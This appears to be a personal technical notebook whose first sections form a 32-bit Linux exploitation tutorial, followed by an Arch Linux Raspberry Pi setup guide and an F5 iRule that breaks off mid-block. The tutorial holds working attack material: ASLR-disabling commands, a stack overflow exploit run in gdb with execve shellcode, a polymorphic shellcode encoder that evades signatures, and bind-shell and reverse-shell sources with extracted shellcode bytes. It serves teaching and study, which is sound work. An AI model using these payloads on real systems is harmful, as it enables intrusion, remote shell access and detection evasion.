# Buffer overflow and arbitrary code execution (32-bit)


Disable protections (ASLR via randomize_va_space; the two exec-shield entries exist only on kernels that carry the Exec Shield patch)

# echo '0' > /proc/sys/kernel/randomize_va_space
# echo '0' > /proc/sys/kernel/exec-shield
# echo '0' > /proc/sys/kernel/exec-shield-randomize


Vulnerable code

# cat vulnerable.c
#include <stdio.h>
#include <string.h>

void check_password(char *p){
        /* Deliberately vulnerable: strcpy() copies the caller-supplied p into
         * a 64-byte stack buffer with no length check, so an argument longer
         * than 64 bytes overwrites the saved frame data and return address of
         * this frame (the gdb dump further down shows the buffer filled past
         * its end). The binary is built with -fno-stack-protector -z execstack,
         * which is what lets the overwrite run code from the stack. The fix is
         * a bounded copy (reject strlen(p) >= sizeof(password), or use
         * strncpy()/strlcpy() with explicit termination) and leaving the
         * compiler/kernel protections enabled. */
        char password[64];
        strcpy(password,p);
        if(strcmp(password,"nop-sled")==0){printf("Correct password\n");}
        else{printf("Incorrect password\n");}
}

int main(int argc,char **argv){
        /* argc is never checked: run with no argument, argv[1] is NULL and
         * check_password() dereferences it inside strcpy(). A robust program
         * would return early when argc < 2; it is left as-is here because the
         * disassembly below refers to exactly this main(). */
        check_password(argv[1]);
        return 0;
}
# gcc -g -fno-stack-protector -z execstack -o vulnerable vulnerable.c

Arbitrary code execution

# gdb -q vulnerable
(gdb) list 1,14
1       #include <stdio.h>
2       #include <string.h>
3
4       void check_password(char *p){
5               char password[64];
6               strcpy(password,p);
7               if(strcmp(password,"nop-sled")==0){printf("Correct password\n");}
8               else{printf("Incorrect password\n");}
9       }
10
11      int main(int argc,char **argv){
12              check_password(argv[1]);
13              return 0;
14      }
(gdb) break 6
(gdb) disassemble main
Dump of assembler code for function main:
   0x08048477 <+0>:     push   %ebp
   0x08048478 <+1>:     mov    %esp,%ebp
   0x0804847a <+3>:     and    $0xfffffff0,%esp
   0x0804847d <+6>:     sub    $0x10,%esp
   0x08048480 <+9>:     mov    0xc(%ebp),%eax
   0x08048483 <+12>:    add    $0x4,%eax
   0x08048486 <+15>:    mov    (%eax),%eax
   0x08048488 <+17>:    mov    %eax,(%esp)
   0x0804848b <+20>:    call   0x8048414 <check_password>
   0x08048490 <+25>:    mov    $0x0,%eax
   0x08048495 <+30>:    leave
   0x08048496 <+31>:    ret
End of assembler dump.
(gdb) run wakamole
Starting program: /vulnerable wakamole

Breakpoint 1, check_password (p=0xbffff935 "wakamole") at vulnerable.c:6
6               strcpy(password,p);
(gdb) x /20x password
0xbffff6f0:     0x08048261      0x00000000      0x00ca0000      0x00000001
0xbffff700:     0xbffff91f      0x0000002f      0xbffff75c      0xb7fd1ff4
0xbffff710:     0x080484a0      0x08049ff4      0x00000002      0x080482fd
0xbffff720:     0xb7fd23e4      0x00000005      0x08049ff4      0x080484c1
0xbffff730:     0x00000000      0x00000000      0xbffff758      0x08048490
(gdb) run `perl -e 'print "\x90"x16 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90\x90" . "\xb0\xf6\xff\xbf"x9'`
The program being debugged has been started already.
Start it from the beginning? (y o n) y

Starting program: /vulnerable `perl -e 'print "\x90"x16 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90\x90" . "\xb0\xf6\xff\xbf"x9'`

Breakpoint 1, check_password (
    p=0xbffff8ed "\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\061\300\231\260\vRh//shh/bin\211\343R\211\342S\211\341̀\220\220\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277")
    at vulnerable.c:6
6               strcpy(password,p);
(gdb) x /20x password
0xbffff6b0:     0x08048261      0x00000000      0x00ca0000      0x00000001
0xbffff6c0:     0xbffff8d7      0x0000002f      0xbffff71c      0xb7fd1ff4
0xbffff6d0:     0x080484a0      0x08049ff4      0x00000002      0x080482fd
0xbffff6e0:     0xb7fd23e4      0x00000005      0x08049ff4      0x080484c1
0xbffff6f0:     0x00000000      0x00000000      0xbffff718      0x08048490
(gdb) next
7               if(strcmp(password,"nop-sled")==0){printf("Correct password\n");}
(gdb) x /20x password
0xbffff6b0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff6c0:     0xb099c031      0x2f68520b      0x6868732f      0x6e69622f
0xbffff6d0:     0x8952e389      0xe18953e2      0x909080cd      0xbffff6b0
0xbffff6e0:     0xbffff6b0      0xbffff6b0      0xbffff6b0      0xbffff6b0
0xbffff6f0:     0xbffff6b0      0xbffff6b0      0xbffff6b0      0xbffff6b0
(gdb) continue
Incorrect password
process 2246 is executing new program: /bin/dash
# exit


References

http://www.overflowedminds.net/Papers/Newlog/Introduccion-Explotacion-Software-Linux.pdf

# Polymorphic shellcode generator


Execve shellcode

# od2sc execve
"\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"

Decoder shellcode

# cat decoder.asm
; Decoder stub that pscg prepends to an encoded payload. The two literal 0
; immediates below (mov cl,0 and sub ...,0) are placeholders: pscg replaces
; them in the emitted byte string with the payload length and the per-byte
; offset (see "mov cl,0x1a" / "sub ...,0x1c" in the ndisasm output).
BITS 32
jmp short jmptrick      ; forward jump; the call below pushes the payload address
decoder:
pop esi                 ; esi = return address of the call = first byte of obfuscated_code
xor ecx,ecx
mov cl,0                ; placeholder: number of payload bytes to restore (8-bit counter)
loop:
sub byte [esi+ecx-1],0  ; placeholder: subtract the offset from each byte, last byte first
dec cl
jnz loop
jmp short obfuscated_code ; payload is now restored in place; execute it
jmptrick:
call decoder
obfuscated_code:
# nasm -f elf decoder.asm
# ld -o decoder decoder.o
# od2sc decoder
"\xeb\x10\x5e\x31\xc9\xb1\x00\x80\x6c\x0e\xff\x00\xfe\xc9\x75\xf7\xeb\x05\xe8\xeb\xff\xff\xff"

Polymorphic shellcode generator

# cat pscg
#!/bin/bash

# Name:   pscg (polymorphic shellcode generator)
# Usage:  pscg <shellcode> [offset]
#
# Prepends the decoder stub below to a copy of the payload in which every
# byte has been incremented by OFFSET, so the stored bytes differ from the
# original and the stub subtracts the offset back at run time.
# Depends on an external helper `bconv` that is not shown on this page;
# from its uses here it evaluates a small arithmetic expression with hex
# input and hex output (`bconv EXPR x x`) -- confirm against the helper.
# Shell hygiene: expansions are unquoted throughout and command
# substitutions use backticks; the script is only safe with the trusted,
# hex-escape-only input its usage line describes.

shellcode="$1"
offset="$2"

# One byte (two hex digits) per line: drop the quotes, split at each \x,
# discard the empty leading line.
bytes=`echo $shellcode | tr -d \" | sed 's/\\\x/\n/g' | grep -v ^$`
# Largest byte value; the default offset is derived from it so that no
# byte exceeds 0xFF after the addition (relies on sort ordering the
# two-digit hex strings the same way as their numeric values).
max=`echo "$bytes" | sort -ru | head -n1`
length=0
# Decoder stub (decoder.asm): the two \x00 placeholders are patched below
# with the payload length (mov cl,N) and the offset (sub byte [...],N).
decoder="\xeb\x10\x5e\x31\xc9\xb1\x00\x80\x6c\x0e\xff\x00\xfe\xc9\x75\xf7\xeb\x05\xe8\xeb\xff\xff\xff"

if [ "$offset" == "" ]; then offset=`bconv FF-$max x x`; fi

echo ""
echo "input      = \"$shellcode\""
echo "offset     = 0x$offset"

# Add the offset to each byte and count the bytes; the count goes into
# the stub's single-byte cl counter, so a payload longer than 255 bytes
# cannot be represented.
for byte in `echo "$bytes"`; do
        length=`bconv $length+1 x x`
        obfuscated=$(echo -n "$obfuscated\x`bconv $byte+$offset x x`")
done

echo "obfuscated = \"$obfuscated\""
echo "length     = 0x$length"

# Each -e replaces the first remaining "00": length first, then offset.
# Relies on the stub containing exactly those two zero bytes in that order
# and on neither substituted value itself being "00".
decoder=`echo $decoder | sed -e "s/00/$length/" -e "s/00/$offset/"`

echo "decoder    = \"$decoder\""
echo ""

output="$decoder$obfuscated"

echo "output  = \"$output\""
echo ""
# Disassemble the result so the patched stub can be checked by eye.
echo -ne $output | ndisasm -u -
# pscg "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"

input      = "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"
offset     = 0x1c
obfuscated = "\x4d\xdc\xb5\xcc\x27\x6e\x84\x4b\x4b\x8f\x84\x84\x4b\x7e\x85\x8a\xa5\xff\x6e\xa5\xfe\x6f\xa5\xfd\xe9\x9c"
length     = 0x1a
decoder    = "\xeb\x10\x5e\x31\xc9\xb1\x1a\x80\x6c\x0e\xff\x1c\xfe\xc9\x75\xf7\xeb\x05\xe8\xeb\xff\xff\xff"

output  = "\xeb\x10\x5e\x31\xc9\xb1\x1a\x80\x6c\x0e\xff\x1c\xfe\xc9\x75\xf7\xeb\x05\xe8\xeb\xff\xff\xff\x4d\xdc\xb5\xcc\x27\x6e\x84\x4b\x4b\x8f\x84\x84\x4b\x7e\x85\x8a\xa5\xff\x6e\xa5\xfe\x6f\xa5\xfd\xe9\x9c"

00000000  EB10              jmp short 0x12
00000002  5E                pop esi
00000003  31C9              xor ecx,ecx
00000005  B11A              mov cl,0x1a
00000007  806C0EFF1C        sub byte [esi+ecx-0x1],0x1c
0000000C  FEC9              dec cl
0000000E  75F7              jnz 0x7
00000010  EB05              jmp short 0x17
00000012  E8EBFFFFFF        call dword 0x2
00000017  4D                dec ebp
00000018  DCB5CC276E84      fdiv qword [ebp-0x7b91d834]
0000001E  4B                dec ebx
0000001F  4B                dec ebx
00000020  8F84844B7E858A    pop dword [esp+eax*4-0x757a81b5]
00000027  A5                movsd
00000028  FF6EA5            jmp dword far [esi-0x5b]
0000002B  FE                db 0xfe
0000002C  6F                outsd
0000002D  A5                movsd
0000002E  FD                std
0000002F  E9                db 0xe9
00000030  9C                pushfd

Polymorphic shellcode execution

# cat shellcode.c
#include <stdio.h>

char shellcode[]="\xeb\x10\x5e\x31\xc9\xb1\x1a\x80\x6c\x0e\xff\x1c\xfe\xc9\x75\xf7\xeb\x05\xe8\xeb\xff\xff\xff\x4d\xdc\xb5\xcc\x27\x6e\x84\x4b\x4b\x8f\x84\x84\x4b\x7e\x85\x8a\xa5\xff\x6e\xa5\xfe\x6f\xa5\xfd\xe9\x9c";
int main(){
        /* Shellcode loader: ret is a local, so (int*)&ret+2 is used as the
         * address of this frame's saved return address (two machine words
         * above the local on this 32-bit build); writing the address of the
         * shellcode[] buffer there makes main() "return" into it. Needs
         * -z execstack (see the gcc line) since the bytes live in a data
         * area. The +2 is compiler/ABI specific -- confirm for any other
         * toolchain. */
        int *ret;
        ret=(int*)&ret+2;
        (*ret)=(int)shellcode;
}
# gcc -z execstack -o shellcode shellcode.c
# ./shellcode
# exit

References

http://www.overflowedminds.net/Papers/Newlog/Introduccion-Explotacion-Software-Linux.pdf

# Local, remote and reverse shellcodes


Local shellcode

# cat execve.c
#include <unistd.h>

int main(){
        /* argv for the new image: the program name followed by the NULL
         * terminator that execve() requires. */
        char *argv_sh[2]={"/bin/sh",0};
        /* Replace this process with /bin/sh; envp is NULL, so the shell
         * starts without an inherited environment. */
        execve("/bin/sh",argv_sh,NULL);
}
# gcc -o execve execve.c
# ./execve
# exit
# cat execve.asm
BITS 32
; execve("/bin/sh",shell,NULL)
; Linux x86 (32-bit) syscall convention: eax = number, ebx/ecx/edx = args.
; The pathname is built on the stack as "/bin//sh": the doubled slash pads
; it to two 4-byte pushes without needing a 0x00 byte inside the string.
xor eax,eax
cdq                     ; xor edx,edx (eax is 0, so sign-extension clears edx)
mov byte al,11          ; system call number (execve)
push edx                ; \0 that terminates the string pushed below
push long 0x68732f2f    ; hs//
push long 0x6e69622f    ; nib/
mov ebx,esp             ; first parameter: pointer to "/bin//sh"
push edx                ; NULL that terminates the argv array
mov edx,esp             ; third parameter: envp points at that NULL (empty environment)
push ebx
mov ecx,esp             ; second parameter: argv = pointer to "/bin//sh", then NULL
int 0x80                ; system call
# nasm -f elf execve.asm
# ld -o execve execve.o
# ./execve
# exit
# od2sc execve
"\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"

Remote shellcode

SERVER# cat remote_execve.c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

int main(){
        /* Bind shell: listen on TCP/1234 on every local address, accept one
         * client, point fds 0-2 at that connection and exec /bin/sh. No
         * return value is checked, so a failed socket/bind/listen/accept
         * still ends in execve() with whatever fd dup2() was handed.
         * From the defender's side this is the pattern to look for: a shell
         * whose standard fds are a socket, or an unexpected listener. */
        char *shell[2];
        int cfd,i,sockfd;
        struct sockaddr_in sin;          /* not zeroed: sin_zero stays uninitialised */

        sockfd=socket(AF_INET,SOCK_STREAM,0);
        sin.sin_family=AF_INET;
        sin.sin_addr.s_addr=0;           /* 0 is INADDR_ANY: bind on all interfaces */
        sin.sin_port=htons(1234);
        bind(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in));
        listen(sockfd,128); // backlog; the kernel caps it at /proc/sys/net/core/somaxconn
        cfd=accept(sockfd,NULL,0);
        /* stdin, stdout and stderr all become the client connection */
        for(i=0;i<3;i++){
                dup2(cfd,i);
        }
        shell[0]="/bin/sh";
        shell[1]=0;
        execve("/bin/sh",shell,NULL);
}
SERVER# gcc -o remote_execve remote_execve.c
SERVER# ./remote_execve
CLIENT# nc 127.0.0.1 1234
hostname
SERVER
exit
CLIENT#
# cat remote_execve.asm
; Bind shell, 32-bit Linux x86: socket/bind(0.0.0.0:1234)/listen/accept, then
; dup2 the accepted fd over 0-2 and execve /bin/sh (same steps as the C
; version above). Socket operations go through socketcall (eax=102): ebx
; selects the operation, ecx points at the argument array built on the stack.
; The "mov byte al,..." forms reuse eax and assume the previous syscall
; returned a small non-negative value, leaving the upper bytes clear.
; NOTE(review): the section is named .txt rather than .text; the transcript
; shows it linked and ran, but .text is the conventional name.
BITS 32
section .txt
global _start
_start:
; sockfd=socket(AF_INET,SOCK_STREAM,0)
; sockfd=socket(2,1,0)
push byte 0x66          ; socketcall number (102)
pop eax
cdq                     ; xor edx,edx (eax is positive, so sign-extension clears edx)
xor ebx,ebx
inc ebx                 ; ebx=0x00000001 (socket)
push edx                ; edx=0x00000000
push byte 0x01
push byte 0x02
mov ecx,esp
int 0x80                ; system call
xchg esi,eax            ; esi = sockfd, kept across the following calls
; bind(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in))
; bind(sockfd,[2,1234,0],16)
push byte 0x66          ; socketcall number (102)
pop eax
inc ebx                 ; ebx=0x00000002 (bind)
push edx                ; edx=0x00000000 (sin_addr = INADDR_ANY)
push word 0xd204        ; 1234
push word bx            ; 0x0002
mov ecx,esp
push byte 0x10          ; 16
push ecx
push esi
mov ecx,esp
int 0x80                ; system call
; listen(sockfd,128)
mov byte al,0x66        ; socketcall number (102)
mov byte bl,0x80        ; 128
push ebx
mov byte bl,0x04        ; ebx=0x00000004 (listen)
push esi
mov ecx,esp
int 0x80                ; system call
; cfd=accept(sockfd,NULL,0)
mov byte al,0x66        ; socketcall number (102)
inc ebx                 ; ebx=0x00000005 (accept)
push edx
push edx
push esi
mov ecx,esp
int 0x80                ; system call
xchg eax,ebx            ; ebx = cfd (first argument of dup2 below)
; dup2(cfd,i)
push byte 0x2
pop ecx
dup_loop:               ; runs with ecx = 2, 1, 0: dup2(cfd,2), dup2(cfd,1), dup2(cfd,0)
mov byte al,0x3f        ; dup2 number (63)
int 0x80                ; system call
dec ecx
jns dup_loop
; execve("/bin/sh",shell,NULL)
xor eax,eax
mov byte al,11          ; system call number
push edx                ; \0
push long 0x68732f2f    ; hs//
push long 0x6e69622f    ; nib/
mov ebx,esp             ; first parameter
push edx
mov edx,esp             ; third parameter
push ebx
mov ecx,esp             ; second parameter
int 0x80                ; system call
SERVER# nasm -f elf remote_execve.asm
SERVER# ld -o remote_execve remote_execve.o
SERVER# ./remote_execve
CLIENT# nc 127.0.0.1 1234
hostname
SERVER
exit
CLIENT#
SERVER# od2sc remote_execve
"\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x6a\x66\x58\x43\x52\x66\x68\x04\xd2\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x80\x53\xb3\x04\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"

Reverse shellcode

SERVER# cat reverse_execve.c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

int main(){
        /* Reverse shell: connect out to 127.0.0.1:1234, point fds 0-2 at
         * the socket and exec /bin/sh. connect()'s result is not checked,
         * so with no listener the shell still runs with its stdio on an
         * unconnected socket. Defender's view: an outbound connection
         * followed by a shell whose standard fds are a socket. */
        char *shell[2];
        int i,sockfd;
        struct sockaddr_in sin;          /* not zeroed: sin_zero stays uninitialised */

        sockfd=socket(AF_INET,SOCK_STREAM,0);
        sin.sin_family=AF_INET;
        sin.sin_addr.s_addr=inet_addr("127.0.0.1");
        sin.sin_port=htons(1234);
        connect(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in));
        /* stdin, stdout and stderr all become the connection */
        for(i=0;i<3;i++){
                dup2(sockfd,i);
        }
        shell[0]="/bin/sh";
        shell[1]=0;
        execve("/bin/sh",shell,NULL);
}
SERVER# gcc -o reverse_execve reverse_execve.c
CLIENT# nc -lv 127.0.0.1 1234
SERVER# ./reverse_execve

Connection from 127.0.0.1 port 1234 [tcp/*] accepted
hostname
SERVER
exit
CLIENT#

SERVER# cat reverse_execve.asm
; Reverse shell, 32-bit Linux x86: socket/connect(127.0.0.1:1234), then dup2
; the socket over fds 0-2 and execve /bin/sh (same steps as the C version
; above). Socket operations go through socketcall (eax=102): ebx selects the
; operation, ecx points at the argument array built on the stack.
; "mov byte al,0x3f" reuses eax and assumes the previous syscall returned a
; small non-negative value, leaving the upper bytes clear.
; NOTE(review): the section is named .txt rather than .text; the transcript
; shows it linked and ran, but .text is the conventional name.
BITS 32
section .txt
global _start
_start:
; sockfd=socket(AF_INET,SOCK_STREAM,0)
; sockfd=socket(2,1,0)
push byte 0x66          ; socketcall number (102)
pop eax
cdq                     ; xor edx,edx (eax is positive, so sign-extension clears edx)
xor ebx,ebx
inc ebx                 ; ebx=0x00000001 (socket)
push edx                ; edx=0x00000000
push byte 0x01
push byte 0x02
mov ecx,esp
int 0x80                ; system call
xchg esi,eax            ; esi = sockfd
; connect(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in))
; connect(sockfd,[2,1234,127.0.0.1],16)
push byte 0x66          ; socketcall number (102)
pop eax
inc ebx                 ; ebx=0x00000002, doubles as AF_INET for the push word below
push dword 0x01bbbb7f   ; 127.187.187.1 (the two 0xbb bytes stand in for the 0x00 bytes of 127.0.0.1)
xor ecx,ecx
mov word [esp+1],cx     ; 127.0.0.1: zero the two middle bytes in place, so no 0x00 appears in the code
push word 0xd204        ; 1234
push word bx            ; 0x0002
mov ecx,esp
push byte 0x10          ; 16
push ecx
push esi
mov ecx,esp
inc ebx                 ; ebx=0x00000003 (connect)
int 0x80                ; system call
xchg ebx,esi            ; ebx = sockfd (first argument of dup2 below)
; dup2(cfd,i)
push byte 0x2
pop ecx
dup_loop:               ; runs with ecx = 2, 1, 0: dup2(sockfd,2), dup2(sockfd,1), dup2(sockfd,0)
mov byte al,0x3f        ; dup2 number (63)
int 0x80                ; system call
dec ecx
jns dup_loop
; execve("/bin/sh",shell,NULL)
xor eax,eax
mov byte al,11          ; system call number
push edx                ; \0
push long 0x68732f2f    ; hs//
push long 0x6e69622f    ; nib/
mov ebx,esp             ; first parameter
push edx
mov edx,esp             ; third parameter
push ebx
mov ecx,esp             ; second parameter
int 0x80                ; system call
SERVER# nasm -f elf reverse_execve.asm
SERVER# ld -o reverse_execve reverse_execve.o
CLIENT# nc -lv 127.0.0.1 1234
SERVER# ./reverse_execve

Connection from 127.0.0.1 port 1234 [tcp/*] accepted
hostname
SERVER
exit
CLIENT#

SERVER# od2sc reverse_execve
"\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x6a\x66\x58\x43\x68\x7f\xbb\xbb\x01\x31\xc9\x66\x89\x4c\x24\x01\x66\x68\x04\xd2\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x87\xde\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"


References

http://www.overflowedminds.net/Papers/Newlog/Introduccion-Explotacion-Software-Linux.pdf

# Objdump to shellcode char array

# cat od2sc
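#!/bin/bash

# Name:   od2sc (objdump to shellcode)
# Usage:  od2sc <object_file>
#
# Disassembles every section of OBJECT_FILE with objdump, keeps only the
# raw opcode bytes (the tab-separated second column of each instruction
# line) and prints them as one C string literal of \xNN escapes.
# Exits 2 on a usage error; otherwise the exit status is that of the
# pipeline, so an unreadable or non-object input is reported instead of
# silently producing an empty "\x" string.

set -o pipefail

if [ "$#" -ne 1 ] || [ ! -r "$1" ]; then
  printf 'Usage: %s <object_file>\n' "${0##*/}" >&2
  exit 2
fi

# -D disassembles all sections, so any data sections are emitted too;
# "--" stops option parsing for filenames that begin with '-'.
objdump -D -- "$1" \
| awk -F'\t' '{print $2}' \
| grep -v '^$' \
| tr -d '\n' \
| sed -e 's/ \+/\\x/g' -e 's/^/"\\x/' -e 's/\\x$/\"\n/'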

# od2sc execve
"\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"

# Arch Linux on Raspberry Pi


Hardware specification (Model B)

- SOC: Broadcom BCM2835 (CPU, GPU, DSP, SDRAM, and single USB port)
- CPU: 700 MHz ARM1176JZF-S core
- GPU: Broadcom VideoCore IV,OpenGL ES 2.0,OpenVG 1080p30 H.264 high-profile encode/decode
- SDRAM: 512 MiB
- USB 2.0: 2 (via integrated USB hub)
- Video outputs: Composite video | Composite RCA, HDMI (not at the same time)
- Audio outputs: TRS connector | 3.5 mm jack, HDMI
- Onboard Storage: SD / MMC / SDIO card slot
- Onboard network: 10/100 Ethernet (RJ45) via USB hub
- Low-level peripherals: 8 × GPIO, UART, I2C bus, SPI bus
- Power ratings: 700 mA (3.5 W)
- Power source: 5 volt via MicroUSB or GPIO header
- Size: 85.60 mm × 53.98 mm
- Weight: 45 g

Download and checksum verification (compare the sha1sum output against the value published alongside the image)

# wget http://files.velocix.com/c1410/images/archlinuxarm/archlinux-hf-2012-09-18/archlinux-hf-2012-09-18.zip
# sha1sum archlinux-hf-2012-09-18.zip
Installation and partition resize

# unzip archlinux-hf-2012-09-18.zip
# dd bs=1M if=archlinux-hf-2012-09-18.img of=/dev/mmcblk0
# sfdisk -l /dev/mmcblk0
# sfdisk /dev/mmcblk0 << EOF
> 32,3008,c,*
> 3040,,L
> EOF
# e2fsck -f /dev/mmcblk0p2
# resize2fs /dev/mmcblk0p2
Booting and login

alarmpi login: root
Password: root
Password and new user

[root@alarmpi ~]# passwd
[root@alarmpi ~]# useradd -m -G users,wheel -s /bin/bash toni
[root@alarmpi ~]# passwd toni
Update and upgrade

[root@alarmpi ~]# pacman -Syu
[root@alarmpi ~]# pacman -S haveged
[root@alarmpi ~]# haveged -w 1024
[root@alarmpi ~]# pacman-key --init
[root@alarmpi ~]# pkill haveged
[root@alarmpi ~]# pacman -Rs haveged
Locale

[root@alarmpi ~]# cat /etc/vconsole.conf
KEYMAP=es
FONT=lat9w-16
FONT_MAP=8859-1_to_uni
[root@alarmpi ~]# grep -v \# /etc/locale.gen
es_ES.UTF-8 UTF-8
[root@alarmpi ~]# locale-gen
[root@alarmpi ~]# echo -e "\nexport LANG=es_ES.UTF-8" >> /etc/profile
Timezone

[root@alarmpi ~]# cp /usr/share/zoneinfo/Europe/Madrid /etc/localtime
Environment customization

[root@alarmpi ~]# tail -n5 /etc/bash.bashrc
PS1='\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
alias ls='ls --color=auto'
alias grep='grep --color=auto'
alias ll='ls -lhF'
alias la='ll -a'
Hostname

[root@alarmpi ~]# cat /etc/hostname 
raspberry
Network

[root@alarmpi ~]# cat /etc/hosts
127.0.0.1 raspberry.lab.net raspberry localhost
[root@alarmpi ~]# cat /etc/resolv.conf
nameserver 8.8.8.8
[root@alarmpi ~]# cat /etc/conf.d/dhcpcd
DHCPCD_ARGS="-q -C resolv.conf"
[root@alarmpi ~]# cat /etc/conf.d/network
interface=eth0
address=192.168.1.100
netmask=24
broadcast=192.168.1.255
gateway=192.168.1.1
[root@alarmpi ~]# pacman -S ppp
[root@alarmpi ~]# pacman -S usb_modeswitch
[root@alarmpi ~]# wget "http://www.sakis3g.org/versions/latest/armv4t/sakis3g.gz"
[root@alarmpi ~]# echo "6c88a9961ba8861f2f668c178c02403f  sakis3g.gz" | md5sum -c
[root@alarmpi ~]# gunzip -v sakis3g.gz
[root@alarmpi ~]# chmod +x sakis3g
[root@alarmpi ~]# mv sakis3g /usr/local/sbin/.
[root@alarmpi ~]# cat /etc/sakis3g.conf
APN="airtelnet.es"
APN_USER="vodafone"
APN_PASS="vodafone"
SIM_PIN="1234"
USBINTERFACE="0"
OTHER="CUSTOM_TTY"
CUSTOM_TTY="/dev/ttyUSB0"
[root@alarmpi ~]# cat /etc/systemd/system/network.service
[Unit]
Description=Network IP Connectivity
Wants=network.target
Before=network.target

[Service]
Type=oneshot
RemainAfterExit=yes
EnvironmentFile=/etc/conf.d/network
ExecStart=/sbin/ip link set dev ${interface} up
ExecStart=/sbin/ip addr add ${address}/${netmask} broadcast ${broadcast} dev ${interface}
ExecStart=/sbin/ip route add default via ${gateway}
ExecStart=/usr/local/sbin/sakis3g connect --console

ExecStop=/sbin/ip addr flush dev ${interface}
ExecStop=/sbin/ip link set dev ${interface} down
ExecStop=/usr/local/sbin/sakis3g disconnect

[Install]
WantedBy=multi-user.target
[root@alarmpi ~]# systemctl disable dhcpcd@eth0.service
[root@alarmpi ~]# systemctl enable network
[root@alarmpi ~]# reboot
Text editor

root@raspberry:~# pacman -S vim
Sound

root@raspberry:~# pacman -S alsa-firmware alsa-utils
root@raspberry:~# modprobe snd-bcm2835
root@raspberry:~# cat /etc/modules-load.d/snd-bcm2835.conf
snd-bcm2835
root@raspberry:~# alsamixer
root@raspberry:~# pacman -S pulseaudio vlc
Video

root@raspberry:~# pacman -S xorg-server xorg-xinit xorg-utils xorg-server-utils
root@raspberry:~# pacman -S xf86-video-fbdev
root@raspberry:~# pacman -S openbox obconf obmenu lxappearance
root@raspberry:~# pacman -S xterm
[toni@raspberry ~]$ mkdir -p /home/toni/.config/openbox/
[toni@raspberry ~]$ cp /etc/xdg/openbox/menu.xml /home/toni/.config/openbox/.
[toni@raspberry ~]$ cp /etc/xdg/openbox/rc.xml /home/toni/.config/openbox/.
[toni@raspberry ~]$ cat .xinitrc
exec dbus-launch openbox-session
[toni@raspberry ~]$ starx
Backup

# dd bs=1M if=/dev/mmcblk0 of=archberry.backup.img
Base development package (Compile C programs)

root@raspberry:~# pacman -Syu
root@raspberry:~# pacman -S base-devel
Binutils

root@raspberry:~# pacman -Syu
root@raspberry:~# pacman -S binutils
Install packages from the AUR with packer

root@raspberry:~# pacman -Syu
root@raspberry:~# mkdir builds
root@raspberry:~# cd builds
root@raspberry:~/builds# wget https://aur.archlinux.org/packages/pa/packer/packer.tar.gz
root@raspberry:~/builds# tar xvzf packer.tar.gz
root@raspberry:~/builds# cd packer
root@raspberry:~/builds/packer# makepkg -s --asroot
root@raspberry:~/builds/packer# cp pkg/packer/usr/bin/packer /usr/bin/packer
root@raspberry:~/builds/packer# cp pkg/packer/usr/share/man/man8/packer.8.gz /usr/share/man/man8/packer.8.gz
root@raspberry:~/builds/packer# cd
root@raspberry:~# rm -rf builds
root@raspberry:~# packer -S comgt
WiringPi library for GPIO access

root@raspberry:~# pacman -Syu
root@raspberry:~# pacman -S wiringpi
[toni@raspberry ~]$ curl http://wiringpi.com/pins
[toni@raspberry ~]$ curl http://wiringpi.com/examples/blink
[toni@raspberry ~]$ gpio mode 0 out
[toni@raspberry ~]$ while [ true ]; do gpio write 0 1; sleep 2; gpio write 0 0; sleep 2; done

# Load balancing based on iRule


iRule configuration

when CLIENT_ACCEPTED {
  # Pins two known client addresses to a preferred pool member each, falling
  # back to the other member when the preferred one is not reported "up".
  # Every other client gets ordinary pool selection with universal (UIE)
  # persistence keyed on the client address.
  # NOTE(review): the LB::status member lookups below give only an address;
  # confirm against the iRules reference whether the member port is also
  # required for the lookup to match.

  set mypool   "foobar"
  set client_1 "1.1.1.1"
  set client_2 "1.1.1.2"
